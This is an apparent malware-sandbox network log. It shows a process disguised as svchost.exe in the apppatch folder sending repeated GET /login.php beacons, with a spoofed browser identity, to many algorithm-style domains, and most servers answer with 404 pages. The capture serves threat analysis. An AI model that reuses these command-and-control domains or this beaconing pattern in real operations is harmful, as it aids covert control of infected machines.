                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600559950 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600979090 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601382017 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.603807926 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.724824905 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            43192.168.2.4540453.64.163.50807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205620050 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            44192.168.2.454047154.212.231.82807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.215039015 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601113081 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601336002 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.604195118 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:13.029170036 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            45192.168.2.454048178.162.203.226807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248603106 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            46192.168.2.45404923.253.46.64807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.610716105 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:13.127690077 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:13.127727985 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            47192.168.2.454051178.162.203.226807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.911328077 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            48192.168.2.454052188.114.96.3807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:14.736706972 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            49192.168.2.4540533.64.163.50807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:14.987425089 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:18.602668047 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
